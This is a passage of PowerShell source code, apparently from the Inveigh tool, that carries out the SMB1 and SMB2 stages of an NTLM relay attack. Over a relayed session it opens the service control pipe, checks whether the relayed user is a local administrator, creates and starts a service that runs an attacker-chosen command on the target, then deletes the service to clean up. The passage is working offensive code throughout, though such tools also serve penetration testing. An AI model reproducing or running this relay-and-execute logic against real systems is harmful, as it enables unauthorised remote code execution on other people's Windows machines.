$SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID $RPC_data.Length $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'StartServiceW' } 'StartServiceW' { if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")]) $SMB_service_context_handle = $SMB_client_receive[92..111] $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length) $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") > $null $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")]) > $null $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'DeleteServiceW' } elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")]) $SMB_relay_failed = $true } else { $SMB_relay_failed = $true } } 'DeleteServiceW' { if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00') { $inveigh.console_queue.Add("SMB relay command executed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")]) } elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")]) } $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length) $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadAndXRequest' $SMB_client_stage_next = 'CloseServiceHandle' $SMB_close_service_handle_stage = 1 } 'CloseServiceHandle' { if($SMB_close_service_handle_stage -eq 1) { $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")]) $SMB_close_service_handle_stage++ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle } else { $SMB_client_stage = 'CloseRequest' $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SMB_FID ($RPC_data.Length + $SCM_data.Length) $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null } 'CloseRequest' { $packet_SMB_header = Get-PacketSMBHeader 0x04 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBCloseRequest 0x00,0x40 $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'TreeDisconnect' } 'TreeDisconnect' { $packet_SMB_header = Get-PacketSMBHeader 0x71 0x18 0x07,0xc8 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBTreeDisconnectRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'Logoff' } 'Logoff' { $packet_SMB_header = Get-PacketSMBHeader 0x74 0x18 0x07,0xc8 0x34,0xfe $inveigh.process_ID_bytes $SMB_user_ID $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $packet_SMB_data = Get-PacketSMBLogoffAndXRequest $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'Exit' } } if($SMB_relay_failed) { $inveigh.console_queue.Add("SMB relay failed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay failed on $Target")]) $SMB_client_stage = 'Exit' } } } else { $SMB_client_stage = 'TreeConnect' :SMB_execute_loop while ($SMB_client_stage -ne 'exit') { switch ($SMB_client_stage) { 'TreeConnect' { $SMB2_message_ID = 4 $packet_SMB2_header = Get-PacketSMB2Header 0x03,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2TreeConnectRequest $SMB_path_bytes $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'CreateRequest' } 'CreateRequest' { $SMB2_tree_ID = 0x01,0x00,0x00,0x00 $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x05,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2CreateRequestFile $SMB_named_pipe_bytes $packet_SMB2_data["SMB2CreateRequestFile_Share_Access"] = 0x07,0x00,0x00,0x00 $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'RPCBind' } 'RPCBind' { $SMB_named_pipe_bytes = 0x73,0x00,0x76,0x00,0x63,0x00,0x63,0x00,0x74,0x00,0x6c,0x00 # \svcctl $SMB_file_ID = $SMB_client_receive[132..147] $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'OpenSCManagerW' } 'ReadRequest' { Start-Sleep -m 150 $SMB2_message_ID += 1 $packet_SMB2_header = Get-PacketSMB2Header 0x08,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_header["SMB2Header_CreditCharge"] = 0x10,0x00 $packet_SMB2_data = Get-PacketSMB2ReadRequest $SMB_file_ID $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') { $SMB_client_stage = $SMB_client_stage_next } else { $SMB_client_stage = 'StatusPending' } } 'StatusPending' { $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '03-01-00-00') { $SMB_client_stage = $SMB_client_stage_next } } 'OpenSCManagerW' { $SMB2_message_ID = 30 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'CheckAccess' } 'CheckAccess' { if([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[108..127]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")]) $SMB_service_manager_context_handle = $SMB_client_receive[108..127] $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data if($SCM_data.Length -lt $SMB_split_index) { $SMB_client_stage = 'CreateServiceW' } else { $SMB_client_stage = 'CreateServiceW_First' } } elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00') { $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) $SMB_relay_failed = $true } else { $SMB_relay_failed = $true } } 'CreateServiceW' { $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'StartServiceW' } 'CreateServiceW_First' { $SMB_split_stage_final = [Math]::Ceiling($SCM_data.Length / $SMB_split_index) $SMB2_message_ID += 20 $SCM_data_first = $SCM_data[0..($SMB_split_index - 1)] $packet_RPC_data = Get-PacketRPCRequest 0x01 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_first $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length) $SMB_split_index_tracker = $SMB_split_index $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if($SMB_split_stage_final -le 2) { $SMB_client_stage = 'CreateServiceW_Last' } else { $SMB_split_stage = 2 $SMB_client_stage = 'CreateServiceW_Middle' } } 'CreateServiceW_Middle' { $SMB_split_stage++ $SMB2_message_ID++ $SCM_data_middle = $SCM_data[$SMB_split_index_tracker..($SMB_split_index_tracker + $SMB_split_index - 1)] $SMB_split_index_tracker += $SMB_split_index $packet_RPC_data = Get-PacketRPCRequest 0x00 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_middle $packet_RPC_data["RPCRequest_AllocHint"] = [System.BitConverter]::GetBytes($SCM_data.Length - $SMB_split_index_tracker + $SMB_split_index) $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null if($SMB_split_stage -ge $SMB_split_stage_final) { $SMB_client_stage = 'CreateServiceW_Last' } else { $SMB_client_stage = 'CreateServiceW_Middle' } } 'CreateServiceW_Last' { $SMB2_message_ID++ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length] $packet_RPC_data = Get-PacketRPCRequest 0x02 0 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'StartServiceW' } 'StartServiceW' { if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")]) $SMB_service_context_handle = $SMB_client_receive[112..131] $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Trying to execute SMB relay command on $Target")]) $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'DeleteServiceW' } elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")]) $SMB_relay_failed = $true } else { $SMB_relay_failed = $true } } 'DeleteServiceW' { if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00') { $inveigh.console_queue.Add("SMB relay command executed on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")]) } elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00') { $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")]) } $SMB2_message_ID += 20 $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length) $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null $SMB_client_stream.Flush() $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null $SMB_client_stage = 'ReadRequest' $SMB_client_stage_next = 'CloseServiceHandle' $SMB_close_service_handle_stage = 1 } 'CloseServiceHandle' { if($SMB_close_service_handle_stage -eq 1) { $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target") $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")]) $SMB2_message_ID += 20 $SMB_close_service_handle_stage++ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle } else { $SMB2_message_ID += 1 $SMB_client_stage = 'CloseRequest' $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle } $packet_SMB2_header = Get-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["SMB2Header_CreditRequest"] = 0x7f,0x00 $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data $packet_SMB2_data = Get-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + 